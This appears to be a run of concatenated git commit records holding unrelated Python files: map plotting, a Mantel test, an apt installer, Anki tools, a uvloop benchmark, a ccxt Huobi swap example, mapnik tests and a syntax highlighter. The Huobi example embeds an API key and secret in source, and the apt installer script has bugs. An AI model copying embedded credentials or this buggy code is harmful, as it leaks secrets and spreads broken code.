) % (a, b, c))
xaxis = extent[0] + np.arange(shp[1] + 1) * 0.01
yaxis = extent[2] + np.arange(shp[0] + 1) * 0.01
lons, lats = np.meshgrid(xaxis, yaxis)
m.pcolormesh(lons, lats, grid, [0, 1, 2])
m.postprocess(filename='/tmp/map_clipoints.png')
m.close()
def main():
extent = get_domain()
grid = make_grid(extent)
update_grid(extent, grid)
draw_map(extent, grid)
if __name__ == '__main__':
main()
| mit | Python | |
68d3107c9b7e71c185b2f0b926af0057d96cdc5a | add script that gives invalid output and writes stderr | AlanCoding/Ansible-inventory-file-examples,AlanCoding/Ansible-inventory-file-examples | scripts/empty/invalid_plus_stderr.py | scripts/empty/invalid_plus_stderr.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
# Write to standard error
print('TEST', file=sys.stderr)
print('{"_meta": {"hostvars": {}}') | mit | Python | |
52ae438ada955209e14c9c86ba56e3c81347930e | Make p-value calculations more numpythonic | corburn/scikit-bio,Kleptobismol/scikit-bio,jdrudolph/scikit-bio,demis001/scikit-bio,jairideout/scikit-bio,gregcaporaso/scikit-bio,averagehat/scikit-bio,kdmurray91/scikit-bio,colinbrislawn/scikit-bio,gregcaporaso/scikit-bio,jdrudolph/scikit-bio,wdwvt1/scikit-bio,Achuth17/scikit-bio,Kleptobismol/scikit-bio,anderspitman/scikit-bio,johnchase/scikit-bio,jensreeder/scikit-bio,Achuth17/scikit-bio,SamStudio8/scikit-bio,wdwvt1/scikit-bio,Kleptobismol/scikit-bio,kdmurray91/scikit-bio,SamStudio8/scikit-bio,jairideout/scikit-bio,johnchase/scikit-bio,averagehat/scikit-bio,colinbrislawn/scikit-bio,jensreeder/scikit-bio,demis001/scikit-bio,anderspitman/scikit-bio,xguse/scikit-bio,corburn/scikit-bio,xguse/scikit-bio | skbio/math/stats/distance/_mantel.py | skbio/math/stats/distance/_mantel.py | # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import pearsonr, spearmanr
from skbio.core.distance import DistanceMatrix
def mantel(x, y, method='pearson', permutations=999, alternative='twosided'):
if method == 'pearson':
corr_func = pearsonr
elif method == 'spearman':
corr_func = spearmanr
else:
raise ValueError("Invalid correlation method '%s'." % method)
if permutations < 0:
raise ValueError("Number of permutations must be greater than or "
"equal to zero.")
if alternative not in ('twosided', 'greater', 'less'):
raise ValueError("Invalid alternative hypothesis '%s'." % alternative)
x = DistanceMatrix(x)
y = DistanceMatrix(y)
# TODO: test size >= 3
if x.shape != y.shape:
raise ValueError("Distance matrices must have the same shape.")
x_flat = x.condensed_form()
y_flat = y.condensed_form()
orig_stat = corr_func(x_flat, y_flat)[0]
if permutations == 0:
p_value = np.nan
else:
perm_gen = (corr_func(x.permute(), y_flat)[0]
for _ in range(permutations))
permuted_stats = np.fromiter(perm_gen, np.float, count=permutations)
if alternative == 'twosided':
count_better = (np.absolute(permuted_stats) >=
np.absolute(orig_stat)).sum()
elif alternative == 'greater':
count_better = (permuted_stats >= orig_stat).sum()
else:
count_better = (permuted_stats <= orig_stat).sum()
p_value = (count_better + 1) / (permutations + 1)
return orig_stat, p_value
| # ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import pearsonr, spearmanr
from skbio.core.distance import DistanceMatrix
def mantel(x, y, method='pearson', permutations=999, alternative='twosided'):
if method == 'pearson':
corr_func = pearsonr
elif method == 'spearman':
corr_func = spearmanr
else:
raise ValueError("Invalid correlation method '%s'." % method)
if permutations < 0:
raise ValueError("Number of permutations must be greater than or "
"equal to zero.")
if alternative not in ('twosided', 'greater', 'less'):
raise ValueError("Invalid alternative hypothesis '%s'." % alternative)
x = DistanceMatrix(x)
y = DistanceMatrix(y)
# TODO: test size >= 3
if x.shape != y.shape:
raise ValueError("Distance matrices must have the same shape.")
x_flat = x.condensed_form()
y_flat = y.condensed_form()
orig_stat = corr_func(x_flat, y_flat)[0]
if permutations == 0:
p_value = np.nan
else:
better = 0
for i in range(permutations):
r = corr_func(x.permute(), y_flat)[0]
if alternative == 'twosided':
if abs(r) >= abs(orig_stat):
better += 1
else:
if ((alternative == 'greater' and r >= orig_stat) or
(alternative == 'less' and r <= orig_stat)):
better += 1
p_value = (better + 1) / (permutations + 1)
return orig_stat, p_value
| bsd-3-clause | Python |
504a5390a78811393e011f01e5b6ddf2a3aae8e8 | Create ubuntu-monolith.py | hatchery/Genepool2,hatchery/genepool | ubuntu-monolith.py | ubuntu-monolith.py | #!/usr/bin/env python
import subprocess
import os
def apt_install(packages):
env = os.environ.copy()
env[DEBIAN_FRONTEND] = "noninteractive"
subprocess.call('sudo -E apt-get update')
subprocess.call('sudo -E apt-get install -y ' + ' '.join(packages))
packages = """
- ack-grep
- ant
- atop
- bastet
- binclock
- boxes
- bsdgames
- build-essential
- byobu
- bzr
- bzr-git
- calcurse
- cloc
- cowsay
- chromium-browser
- dict
- dstat
- dtach
- duplicity
- emacs
- figlet
- findutils
- fortune
- gcc
- gdb
- gist
- glances
- golang
- gradle
- greed
- htop
- irssi
- jq
- ledger
- less
- lua5.2
- maven
- maven2
- mc
- mdm
- mercurial
- mercurial-git
- moon-buggy
- mosh
- most
- mtr
- multitail
- nethack-console
- nethogs
- netpipes
- ninvaders
- octave
- parallel
- python-software-properties
- qemu
- qemu-kvm
- qalc
- r-base
- ranger
- rbenv
- remind
- ruby
- screen
- siege
- silversearcher-ag
- sl
- slashem
- socat
- squid3
- steghide
- stegsnow
- subversion
- sudo
- sysstat
- task
- toilet
- tpp
- tmux
- tsung
- ttyrec
- vifm
- vim
- vim-gtk
- weechat
- wyrd
- zsh
""".split("\n- ")
apt_install(packages)
| mit | Python | |
96c873da602bf34fb129b3d86378e729d7d94d72 | Create BoofCv.py | MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab,MyRobotLab/pyrobotlab | home/Mats/BoofCv.py | home/Mats/BoofCv.py | boof = Runtime.createAndStart("boof","BoofCv")
args = ["Test"]
boof.main(args)
| apache-2.0 | Python | |
fcfb2b768f07bab8c94d83d9d53d70263d078b75 | Create MAP_loader.py | openEduConnect/eduextractor | eduextractor/MAP_loader.py | eduextractor/MAP_loader.py | import requests
import pandas as pd
from zipfile import ZipFile
from StringIO import StringIO
from nweaconfig import NWEA_USERNAME, NWEA_PASSWORD
## import database configuration from parent directory
## config contains SQLalchemy engine and a few DB functions
import sys
sys.path.append('../config')
import databaseconfig
## send a GET request to the API endpoint
print 'Connecting to NWEA...'
cdf_url = 'https://api.mapnwea.org/services/reporting/dex'
r = requests.get(cdf_url, auth=(NWEA_USERNAME,NWEA_PASSWORD))
print r.reason
## if the request is successful...
if r.status_code == 200:
print 'Downloading CDF...'
## convert the response content into a zipfile
z = ZipFile(StringIO(r.content))
zfiles = z.namelist()
## create database engine and open a connection
print 'Connecting to database...'
engine = databaseconfig.DB_ENGINE
conn = engine.connect()
for i, f in enumerate(zfiles):
print 'Extracting', f
## open/extract file from zip
cdf = z.open(f)
## read into dataframe
df = pd.read_csv(cdf)
## define the table name
tablename = 'AUTOLOAD$NWEA_' + f.strip('.csv')
## load it!
if len(df) > 0:
print 'Loading %s records into database...' % (len(df))
## truncate
databaseconfig.truncate_table(conn, tablename)
## "append" to the truncated destination table
df.to_sql(tablename, engine, if_exists='append', index_label='BINI_ID')
conn.close()
print 'Done!'
| mit | Python | |
feb7dbeeb055696bf6646dba0bf3bb224d70b283 | Add separate text manipulation class | luoliyan/incremental-reading-for-anki,luoliyan/incremental-reading-for-anki | ir/text.py | ir/text.py | from collections import defaultdict
from anki.notes import Note
from aqt import mw
from aqt.addcards import AddCards
from aqt.editcurrent import EditCurrent
from aqt.utils import showInfo, tooltip
from .util import fixImages, getField, getInput, setField
class TextManager:
def __init__(self, settings):
self.history = defaultdict(list)
self.settings = settings
def highlight(self, bgColor=None, textColor=None):
if not bgColor:
bgColor = self.settings['highlightBgColor']
if not textColor:
textColor = self.settings['highlightTextColor']
script = "highlight('%s', '%s');" % (bgColor, textColor)
mw.web.eval(script)
self.save()
def extract(self):
if not mw.web.selectedText():
showInfo('Please select some text to extract.')
return
if self.settings['plainText']:
mw.web.evalWithCallback('getPlainText()', self.create)
else:
mw.web.evalWithCallback('getHtmlText()', self.create)
def create(self, text):
self.highlight(self.settings['extractBgColor'],
self.settings['extractTextColor'])
currentCard = mw.reviewer.card
currentNote = currentCard.note()
model = mw.col.models.byName(self.settings['modelName'])
newNote = Note(mw.col, model)
newNote.tags = currentNote.tags
setField(newNote, self.settings['textField'], fixImages(text))
setField(newNote,
self.settings['sourceField'],
getField(currentNote, self.settings['sourceField']))
if self.settings['editSource']:
EditCurrent(mw)
if self.settings['extractDeck']:
did = mw.col.decks.byName(self.settings['extractDeck'])['id']
else:
did = currentCard.did
if self.settings['editExtract']:
addCards = AddCards(mw)
addCards.editor.setNote(newNote)
deckName = mw.col.decks.get(did)['name']
addCards.deckChooser.deck.setText(deckName)
addCards.modelChooser.models.setText(self.settings['modelName'])
else:
title = getInput('Extract Text', 'Title')
setField(newNote, self.settings['titleField'], title)
newNote.model()['did'] = did
mw.col.addNote(newNote)
def remove(self):
mw.web.eval('removeText()')
self.save()
def undo(self):
note = mw.reviewer.card.note()
if note.id not in self.history or not self.history[note.id]:
showInfo('No undo history for this note.')
return
note['Text'] = self.history[note.id].pop()
note.flush()
mw.reset()
tooltip('Undone.')
def save(self):
def callback(text):
if text:
note = mw.reviewer.card.note()
self.history[note.id].append(note['Text'])
note['Text'] = text
note.flush()
mw.web.evalWithCallback(
'document.getElementsByClassName("ir-text")[0].innerHTML;',
callback)
| isc | Python | |
b044ba312b126cb17bf906b1984e7b407509fcc6 | Add script to assist in packaging. | davidalber/Geneagrapher,davidalber/Geneagrapher | Geneagrapher/makedist.py | Geneagrapher/makedist.py | """This tool sets up a distribution of the software by automating
several tasks that need to be done.
The directory should be in pristine condition when this is run (i.e.,
devoid of files that need to be removed before packaging begins). It
is best to run this on a fresh check out of the repository."""
import os
import licensify
if __name__ == '__main__':
# "Licensify" the source files.
files = ['geneagrapher/GGraph.py', 'geneagrapher/geneagrapher.py',
'geneagrapher/grab.py', 'geneagrapher/ggrapher.py']
license = 'COPYING'
for file in files:
res = licensify.prependLicense(file, license)
fout = open(file, "w")
fout.write(res)
fout.close()
# Remove files (including this one) that are not to be in the
# distribution.
os.system('svn rm licensify.py')
os.system('rm -f licensify.pyc')
os.system('svn rm makedist.py')
os.system('rm -f makedist.pyc')
# Make the distribution.
os.system('python setup.py sdist --format gztar,zip')
# Compute digests and signatures.
os.chdir('dist')
dirl = os.listdir('.')
for file in dirl:
comm = 'sha1sum %s > %s.sha1' % (file, file)
os.system(comm)
comm = 'gpg -abs %s' % (file)
os.system(comm)
os.chdir('..')
# Add files to repository.
os.system('svn add Geneagrapher.egg-info')
os.system('svn add dist')
| mit | Python | |
410b354cb0e72ba741439a337aba4ef4c3cda8b1 | Add existing python file for performing a very crude analysis on a set of lsl files (as taken from an untarred OAR, for example) | justinccdev/opensimulator-tools,justinccdev/opensimulator-tools,justinccdev/opensimulator-tools,justinccdev/opensimulator-tools | src/ossa.py | src/ossa.py | #!/usr/bin/python
import re
import sys
""" Taken from http://stackoverflow.com/questions/2669059/how-to-sort-alpha-numeric-set-in-python"""
def sorted_nicely(l):
""" Sort the given iterable in the way that humans expect."""
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(l, key = alphanum_key)
print "Hello World"
# Usage
if len(sys.argv) == 1:
print "Usage: %s <path>+" % sys.argv[0]
sys.exit(-1)
functionsFound = set()
filenames = sys.argv[1:]
for filename in filenames:
lsl = file(filename).readlines()
scriptFuncRe = re.compile("\s+((?:(?:ll)|(?:os)|(?:mod)|(?:Json)|(?:ls))\w+)\(");
for line in lsl:
# print "Analyzing %s" % line
match = scriptFuncRe.search(line)
if match != None:
# print "Found match %s: %s" % (fn, match.group(1))
functionsFound.add(match.group(1))
for fn in sorted_nicely(functionsFound):
print "Found %s" % fn
print "%s functions used" % len(functionsFound)
print "Fin"
| bsd-3-clause | Python | |
252ab143b139e39a1ef87150d8008704107fe1d8 | Create Database.py | albertcuesta/PEACHESTORE | database/Database.py | database/Database.py | __author__ = 'albert cuesta'
import os.path
class database:
def listaraplicaiones(self):
result = []
with open("database/data/aplicaciones.txt", mode='r+', encoding='utf-8') as file:
resultado = file.read()
texto = resultado.split("\n")
for linea in texto:
result.append(linea.split(","))
return result
def listaraplicacionespago(self):
aplicaciones=[]
fo = open("database/data/aplicacionesPago.txt", mode='r', encoding='utf-8')
for line in fo:
return line
fo.close()
def añadiraplicacionpago(self, nombre, proveedor, fecha, precio, descargas,puntuacion,comentarios):
aplicacion = []
with open("database/data/aplicacionesPago.txt", mode='a',encoding='utf-8')as archivo1:
archivo1.write(nombre+","+proveedor+","+fecha+","+precio+","+descargas+","+puntuacion+","+comentarios+"\n")
print ("app insertada")
def añadiraplicacionfree(self, nombre, proveedor, fecha, precio, descargas,puntuacion,comentarios):
aplicacion = []
with open("database/data/aplicaciones.txt", mode='a',encoding='utf-8')as archivo:
archivo.write(nombre+","+proveedor+","+fecha+","+precio+","+descargas+","+puntuacion+","+comentarios+"\n")
print ("app insertada")
def sumarDescarga(self, nombre, pathToDb="database/data/aplicaciones.txt"):
if os.path.isfile('database/data/aplicaciones.txt'):
file = open(pathToDb, 'r')
llista = file.readlines()
file.close()
trobat = False
with open(pathToDb, 'w') as file:
for linia in llista:
if linia.split(";")[0] != nombre:
file.write(linia)
else:
linia1 = linia.split(";")
descargues = int(linia.split(";")[4])
resultat = linia1[0]+";"+linia1[1]+";"+linia1[2]+";"+linia1[3]+";"+str(descargues+1)+";"+linia1[5]+";"+linia1[6]+";"+linia1[7]
file.write(resultat)
trobat = True
else:
print("Error! No se ha podido encontrar el fichero de aplicaciones!")
return trobat
| mit | Python | |
71d8ef8a872656df8a2319032855cb2b5ea5ed4b | Add a new benchmark - readline server | MagicStack/uvloop,1st1/uvloop,MagicStack/uvloop | examples/bench/rlserver.py | examples/bench/rlserver.py | import argparse
import asyncio
import gc
import uvloop
import os.path
import socket as socket_module
from socket import *
PRINT = 0
async def echo_client_streams(reader, writer):
sock = writer.get_extra_info('socket')
try:
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
except (OSError, NameError):
pass
if PRINT:
print('Connection from', sock.getpeername())
while True:
data = await reader.readline()
if not data:
break
writer.write(data)
if PRINT:
print('Connection closed')
writer.close()
async def print_debug(loop):
while True:
print(chr(27) + "[2J") # clear screen
loop.print_debug_info()
await asyncio.sleep(0.5, loop=loop)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--uvloop', default=False, action='store_true')
parser.add_argument('--addr', default='127.0.0.1:25000', type=str)
parser.add_argument('--print', default=False, action='store_true')
args = parser.parse_args()
if args.uvloop:
loop = uvloop.new_event_loop()
print('using UVLoop')
else:
loop = asyncio.new_event_loop()
print('using asyncio loop')
asyncio.set_event_loop(loop)
loop.set_debug(False)
if args.print:
PRINT = 1
if hasattr(loop, 'print_debug_info'):
loop.create_task(print_debug(loop))
PRINT = 0
unix = False
if args.addr.startswith('file:'):
unix = True
addr = args.addr[5:]
if os.path.exists(addr):
os.remove(addr)
else:
addr = args.addr.split(':')
addr[1] = int(addr[1])
addr = tuple(addr)
print('readline performance test')
print('serving on: {}'.format(addr))
print('using asyncio/streams')
if unix:
coro = asyncio.start_unix_server(echo_client_streams,
addr, loop=loop, limit=256000)
else:
coro = asyncio.start_server(echo_client_streams,
*addr, loop=loop, limit=256000)
srv = loop.run_until_complete(coro)
try:
loop.run_forever()
finally:
if hasattr(loop, 'print_debug_info'):
gc.collect()
print(chr(27) + "[2J")
loop.print_debug_info()
loop.close()
| apache-2.0 | Python | |
af2303062c7d4bbbcbe92df3d0c01d7729b910f2 | add swap example | ccxt/ccxt,ccxt/ccxt,ccxt/ccxt,ccxt/ccxt,ccxt/ccxt | examples/py/huobi-swaps.py | examples/py/huobi-swaps.py | # -*- coding: utf-8 -*-
import os
from random import randint
import sys
from pprint import pprint
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root + '/python')
import ccxt # noqa: E402
print('CCXT Version:', ccxt.__version__)
# NOTE(review): API key/secret are committed in source -- presumably
# throwaway sandbox credentials; rotate/remove them if they are real.
exchange = ccxt.huobi({
    'apiKey': 'ez2xc4vb6n-da8c4c7d-76cbde5b-7cc77',
    'secret': '03454cfd-cf15e71b-fe87eadf-16a79',
    'options': {
        'defaultType': 'future',
    },
})
# Fetch and cache market metadata before making trading calls.
markets = exchange.load_markets()
# exchange.verbose = True # uncomment for debugging purposes if necessary
# # ## Create a linear future (limit) order
# symbol = 'ADA/USDT:USDT'
# order_type = 'limit'
# side = 'buy'
# offset = 'open'
# # contract_type = 'this_week'
# cli_order_id = randint(0,1000)
# leverage = 1
# amount = 1 # 1 contract = 10 ADA
# price = 1
# params = {'offset': offset, 'lever_rate': leverage, 'client_order_id': cli_order_id}
# try:
# order = exchange.create_order(symbol, order_type, side, amount, price, params)
# print(order)
# except Exception as e:
# print(type(e).__name__, str(e))
## Create a inverse swap (limit) order that will
# Order parameters for the inverse ADA swap described above.
symbol = 'ADA/USD:ADA'
order_type = 'limit'
side = 'buy'
offset = 'open'
cli_order_id = randint(0,1000)
leverage = 1
amount = 1
price = 1
# Huobi-specific extras: position offset, leverage, client order id.
params = {'offset': offset, 'lever_rate': leverage, 'client_order_id': cli_order_id}
try:
    # Place the order, print it, then cancel it (demo round-trip).
    order = exchange.create_order(symbol, order_type, side, amount, price, params)
    print(order)
    cancelOrder = exchange.cancel_order(order['id'], symbol)
except Exception as e:
    print(type(e).__name__, str(e))
| mit | Python | |
1ac4dd4438dd054f32e23c6db01d2382507ed4c7 | break out shapefile tests | lightmare/mapnik,Airphrame/mapnik,whuaegeanse/mapnik,CartoDB/mapnik,CartoDB/mapnik,Airphrame/mapnik,cjmayo/mapnik,tomhughes/mapnik,rouault/mapnik,Mappy/mapnik,Mappy/mapnik,Mappy/mapnik,mbrukman/mapnik,yiqingj/work,mapycz/mapnik,pnorman/mapnik,lightmare/mapnik,kapouer/mapnik,pnorman/mapnik,rouault/mapnik,tomhughes/python-mapnik,kapouer/mapnik,mapycz/python-mapnik,zerebubuth/mapnik,Uli1/mapnik,mapnik/mapnik,pramsey/mapnik,naturalatlas/mapnik,pramsey/mapnik,jwomeara/mapnik,tomhughes/python-mapnik,manz/python-mapnik,davenquinn/python-mapnik,qianwenming/mapnik,mapnik/mapnik,strk/mapnik,Uli1/mapnik,strk/mapnik,Airphrame/mapnik,garnertb/python-mapnik,strk/mapnik,qianwenming/mapnik,yohanboniface/python-mapnik,whuaegeanse/mapnik,rouault/mapnik,whuaegeanse/mapnik,mapycz/mapnik,lightmare/mapnik,Uli1/mapnik,cjmayo/mapnik,strk/mapnik,CartoDB/mapnik,yohanboniface/python-mapnik,naturalatlas/mapnik,manz/python-mapnik,naturalatlas/mapnik,Mappy/mapnik,sebastic/python-mapnik,tomhughes/python-mapnik,garnertb/python-mapnik,davenquinn/python-mapnik,mapnik/python-mapnik,kapouer/mapnik,zerebubuth/mapnik,yiqingj/work,qianwenming/mapnik,yiqingj/work,lightmare/mapnik,mbrukman/mapnik,cjmayo/mapnik,Uli1/mapnik,pramsey/mapnik,qianwenming/mapnik,mapnik/python-mapnik,jwomeara/mapnik,jwomeara/mapnik,mapnik/mapnik,stefanklug/mapnik,pnorman/mapnik,davenquinn/python-mapnik,mapycz/python-mapnik,sebastic/python-mapnik,qianwenming/mapnik,rouault/mapnik,zerebubuth/mapnik,kapouer/mapnik,sebastic/python-mapnik,mapnik/python-mapnik,pramsey/mapnik,Airphrame/mapnik,yohanboniface/python-mapnik,jwomeara/mapnik,mapnik/mapnik,mbrukman/mapnik,stefanklug/mapnik,stefanklug/mapnik,tomhughes/mapnik,whuaegeanse/mapnik,garnertb/python-mapnik,tomhughes/mapnik,tomhughes/mapnik,stefanklug/mapnik,manz/python-mapnik,mbrukman/mapnik,naturalatlas/mapnik,yiqingj/work,cjmayo/mapnik,pnorman/mapnik,mapycz/mapnik | tests/python_tests/shapefile_test.py | 
tests/python_tests/shapefile_test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from nose.tools import *
from utilities import execution_path
import os, mapnik2
def setup():
    """Chdir to the test directory so relative data paths resolve."""
    # All of the paths used are relative, if we run the tests
    # from another directory we need to chdir()
    os.chdir(execution_path('.'))
# Only define the shapefile tests when the 'shape' input plugin is built.
if 'shape' in mapnik2.DatasourceCache.instance().plugin_names():
    # Shapefile initialization
    def test_shapefile_init():
        # Envelope coordinates are compared with fewer decimal places as
        # their magnitudes grow.
        s = mapnik2.Shapefile(file='../../demo/data/boundaries')
        e = s.envelope()
        assert_almost_equal(e.minx, -11121.6896651, places=7)
        assert_almost_equal(e.miny, -724724.216526, places=6)
        assert_almost_equal(e.maxx, 2463000.67866, places=5)
        assert_almost_equal(e.maxy, 1649661.267, places=3)
    # Shapefile properties
    def test_shapefile_properties():
        s = mapnik2.Shapefile(file='../../demo/data/boundaries', encoding='latin1')
        f = s.features_at_point(s.envelope().center()).features[0]
        eq_(f['CGNS_FID'], u'6f733341ba2011d892e2080020a0f4c9')
        eq_(f['COUNTRY'], u'CAN')
        eq_(f['F_CODE'], u'FA001')
        eq_(f['NAME_EN'], u'Quebec')
        # this seems to break if icu data linking is not working
        eq_(f['NOM_FR'], u'Qu\xe9bec')
        eq_(f['NOM_FR'], u'Québec')
        eq_(f['Shape_Area'], 1512185733150.0)
        eq_(f['Shape_Leng'], 19218883.724300001)
        # Check that the deprecated interface still works,
        # remove me once the deprecated code is cleaned up
        eq_(f.properties['Shape_Leng'], 19218883.724300001)
if __name__ == "__main__":
    setup()
    # Invoke every module-level name containing 'test_' (nose-style run).
    [eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | Python | |
64dac000cd4edb3a461918f8253e43bc47d6b594 | Create editUtils.py | ssarkar2/caffeSEA,ssarkar2/caffeSEA | utils/editUtils.py | utils/editUtils.py | # new_data = {'max_iter': 5000, 'snapshot': 500}
def createSolverPrototxt(new_data, save_loc):
f = open('solverToy.prototxt')
def_text = f.read().split('\n')
def_text.remove('')
solver_default_dict = {module.split(': ')[0]: module.split(': ')[1] for module in def_text}
new_dictionary = solver_default_dict
for key, value in new_data.iteritems():
new_dictionary[key] = str(value)
f.close()
new_solver_text = ['{}: {}'.format(key, value) for key, value in new_dictionary.iteritems()]
new_proto = '\n'.join(new_solver_text)
new_file_name = save_loc + 'solverToy_new.prototxt'
f_new = open(new_file_name, 'w')
f_new.write(new_proto)
f_new.close()
| mit | Python | |
b41776096e6982e6ef0faef1fc95b550bebed9e8 | add script to calculate average oil price | thiagodasilva/home_automation,thiagodasilva/home_automation | oil_price/average_oil_price.py | oil_price/average_oil_price.py | #!/usr/bin/env python
import urllib
import paho.mqtt.publish as publish
from bs4 import BeautifulSoup as bs
newenglandoil = urllib.urlopen("http://www.newenglandoil.com/massachusetts/zone10.asp?x=0").read()
soup = bs(newenglandoil, 'lxml')
oil_table = soup.find('table')
tbody = oil_table.find('tbody')
rows = tbody.find_all('tr')
sum = 0
for row in rows:
td = row.find_all('td')
sum += float(td[2].get_text()[1:])
average = sum/len(rows)
publish.single('average_oil_price', average)
| mit | Python | |
a7a8cee70ffee9446aad19c9775d13c2b608c397 | Add RungeKuttaEvolver class. | fangohr/oommf-python,fangohr/oommf-python,fangohr/oommf-python | new/evolvers.py | new/evolvers.py | class RungeKuttaEvolve(object):
def __init__(self, alpha, gamma_G=2.210173e5, start_dm=0.01):
if not isinstance(alpha, (int, float)) or alpha < 0:
raise ValueError('alpha must be a positive float or int.')
else:
self.alpha = alpha
if not isinstance(gamma_G, (float, int)) or gamma_G <= 0:
raise ValueError('gamma_G must be a positive float or int.')
else:
self.gamma_G = gamma_G
if not isinstance(start_dm, (float, int)) or start_dm <= 0:
raise ValueError('start_dm must be a positive float or int.')
else:
self.start_dm = start_dm
def get_mif(self):
data = [('alpha', self.alpha),
('gamma_G', self.gamma_G),
('start_dm', self.start_dm)]
# Create mif string.
mif = '# RungeKutta evolver\n'
for datum in data:
mif += 'set {} {}\n'.format(datum[0], datum[1])
mif += 'Specify Oxs_RungeKuttaEvolve {\n'
mif += '\talpha $alpha\n'
mif += '\tgamma_G $gamma_G\n'
mif += '\tstart_dm $start_dm\n'
mif += '}\n\n'
return mif
| bsd-2-clause | Python | |
39c853f64b837d257333c5731067c811344f9dfd | Add highlight.py (Python syntax highlighting) | kikocorreoso/brython,Isendir/brython,Hasimir/brython,amrdraz/brython,amrdraz/brython,kevinmel2000/brython,JohnDenker/brython,firmlyjin/brython,Mozhuowen/brython,Mozhuowen/brython,molebot/brython,amrdraz/brython,olemis/brython,olemis/brython,rubyinhell/brython,Lh4cKg/brython,molebot/brython,Mozhuowen/brython,brython-dev/brython,Lh4cKg/brython,brython-dev/brython,brython-dev/brython,olemis/brython,rubyinhell/brython,Isendir/brython,kevinmel2000/brython,firmlyjin/brython,rubyinhell/brython,Hasimir/brython,Mozhuowen/brython,molebot/brython,Lh4cKg/brython,kikocorreoso/brython,JohnDenker/brython,rubyinhell/brython,olemis/brython,jonathanverner/brython,jonathanverner/brython,Isendir/brython,Lh4cKg/brython,Hasimir/brython,Hasimir/brython,firmlyjin/brython,jonathanverner/brython,JohnDenker/brython,Isendir/brython,firmlyjin/brython,molebot/brython,kikocorreoso/brython,firmlyjin/brython,amrdraz/brython,jonathanverner/brython,kevinmel2000/brython,JohnDenker/brython,kevinmel2000/brython | src/Lib/site-packages/highlight.py | src/Lib/site-packages/highlight.py | import keyword
import _jsre as re
from browser import html
letters = 'abcdefghijklmnopqrstuvwxyz'
letters += letters.upper()+'_'
digits = '0123456789'
builtin_funcs = ("abs|divmod|input|open|staticmethod|all|enumerate|int|ord|str|any|" +
"eval|isinstance|pow|sum|basestring|execfile|issubclass|print|super|" +
"binfile|iter|property|tuple|bool|filter|len|range|type|bytearray|" +
"float|list|raw_input|unichr|callable|format|locals|reduce|unicode|" +
"chr|frozenset|long|reload|vars|classmethod|getattr|map|repr|xrange|" +
"cmp|globals|max|reversed|zip|compile|hasattr|memoryview|round|" +
"__import__|complex|hash|min|set|apply|delattr|help|next|setattr|" +
"buffer|dict|hex|object|slice|coerce|dir|id|oct|sorted|intern")
kw_pattern = '^('+'|'.join(keyword.kwlist)+')$'
bf_pattern = '^('+builtin_funcs+')$'
def highlight(txt, string_color="blue", comment_color="green",
              keyword_color="purple"):
    """Return an html.PRE element with Python syntax highlighting of txt.

    String literals, comments and keyword/builtin names are wrapped in
    colored SPAN elements; every other character is appended verbatim.
    (The leftover debug print of the whole element was removed.)
    """
    res = html.PRE()
    i = 0
    name = ''  # identifier currently being accumulated
    while i<len(txt):
        car = txt[i]
        if car in ["'",'"']:
            # String literal: scan for the matching quote, treating a
            # quote preceded by an odd number of backslashes as escaped.
            k = i+1
            while k<len(txt):
                if txt[k]==car:
                    nb_as = 0
                    j = k-1
                    while True:
                        if txt[j]=='\\':
                            nb_as+=1
                            j -= 1
                        else:
                            break
                    if nb_as % 2 == 0:
                        res <= html.SPAN(txt[i:k+1],
                            style=dict(color=string_color))
                        i = k
                        break
                k += 1
        elif car == '#': # comment
            # Color up to (but not including) the newline; i is stepped
            # to end-1 so the shared `i += 1` below lands on the newline.
            end = txt.find('\n', i)
            if end== -1:
                res <= html.SPAN(txt[i:],style=dict(color=comment_color))
                break
            else:
                res <= html.SPAN(txt[i:end],style=dict(color=comment_color))
                i = end-1
        elif car in letters:
            name += car
        elif car in digits and name:
            # Digits may continue an identifier but never start one.
            name += car
        else:
            # Non-identifier character: flush any pending name first,
            # coloring it if it is a keyword or a builtin.
            if name:
                if re.search(kw_pattern,name):
                    res <= html.SPAN(name,style=dict(color=keyword_color))
                elif re.search(bf_pattern,name):
                    res <= html.SPAN(name,style=dict(color=keyword_color))
                else:
                    res <= name
                name = ''
            res <= car
        i += 1
    # Flush a trailing identifier left over at end of input.
    res <= name
return res | bsd-3-clause | Python | |
d5bf180394233a165f4b5ad8c6561509a4e465ca | add goliad health check | yieldbot/sensu-yieldbot-plugins,yieldbot/sensu-yieldbot-plugins,yieldbot/sensu-yieldbot-plugins | plugins/bongo/check-goliad-health.py | plugins/bongo/check-goliad-health.py | #!/usr/bin/env python
from optparse import OptionParser
import socket
import sys
import httplib
import json
PASS = 0
WARNING = 1
FAIL = 2
def get_bongo_host(server, app):
    # Query the Marathon API for `app` and return the (host, port) of its
    # first task.  Any failure (HTTP error, bad JSON, no tasks) prints a
    # message and exits with the sensu FAIL code.
    try:
        con = httplib.HTTPConnection(server, timeout=45)
        con.request("GET","/v2/apps/" + app)
        data = con.getresponse()
        # NOTE(review): message says "non-2xx" but 1xx responses would
        # also pass this >= 300 check -- confirm the intended range.
        if data.status >= 300:
            print "get_bongo_host: Recieved non-2xx response= %s" % (data.status)
            sys.exit(FAIL)
        json_data = json.loads(data.read())
        host = json_data['app']['tasks'][0]['host']
        port = json_data['app']['tasks'][0]['ports'][0]
        con.close()
        return host, port
    except Exception, e:
        print "%s Exception caught in get_bongo_host" % (e)
        sys.exit(FAIL)
def get_status(host, group):
